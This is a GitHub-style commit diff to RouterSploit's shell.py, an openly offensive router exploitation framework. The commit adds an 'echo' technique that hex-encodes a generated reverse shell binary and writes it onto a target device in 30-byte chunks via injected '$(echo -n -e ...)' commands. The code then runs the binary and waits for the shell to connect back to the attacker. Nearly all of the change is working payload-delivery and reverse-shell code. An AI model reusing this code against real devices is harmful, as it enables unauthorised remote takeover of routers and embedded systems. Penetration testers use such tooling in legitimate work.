Adding echo technique to transfer binary.

gitcollect · May 24, 2016 · 0011b6c · 0011b6c
1 parent a05b67e
commit 0011b6c
Showing 1 changed file with 29 additions and 1 deletion.
diff --git a/routersploit/shell.py b/routersploit/shell.py
@@ -33,6 +33,8 @@ def shell(exploit, architecture="", method="", **params):
 
                 if method == "wget":
                     revshell.wget(binary=params['binary'], location=params['location'])
+                elif method == "echo":
+                    revshell.echo(binary=params['binary'], location=params['location'])
                 elif method == "awk":
                     revshell.awk(binary=params['binary'])
                 elif method == "netcat":
@@ -93,7 +95,7 @@ def convert_port(self, p):
 
     def generate_binary(self, lhost, lport):
         print_status("Generating reverse shell binary")
-        self.binary_name = random_text(32)
+        self.binary_name = random_text(8)
         ip = self.convert_ip(lhost)
         port = self.convert_port(lport)
 
@@ -137,6 +139,32 @@ def wget(self, binary, location):
         # waiting for shell
         self.shell(sock)
 
+    def echo(self, binary, location):
+        # generate binary
+        self.generate_binary(self.lhost, self.lport)
+        path = "{}/{}".format(location, self.binary_name)
+
+        size = len(self.revshell) 
+        num_parts = (size / 30) + 1
+
+        # transfer binary through echo command
+        print_status("Using echo method to transfer binary")
+        for i in range(0, num_parts):
+            current = i * 30
+            print_status("Transferring {}/{} bytes".format(current, len(self.revshell)))
+
+            block = self.revshell[current:current+30].encode('hex')
+            block = "\\x" + "\\x".join(a+b for a,b in zip(block[::2], block[1::2]))
+            cmd = '$(echo -n -e "{}" >> {})'.format(block, path)
+            self.exploit.execute(cmd)
+
+        # execute binary
+        sock = self.listen(self.lhost, self.lport)
+        self.execute_binary(location, self.binary_name)
+
+        # waiting for shell
+        self.shell(sock)
+
     def awk(self, binary):
         # run reverse shell through awk
         sock = self.listen(self.lhost, self.lport)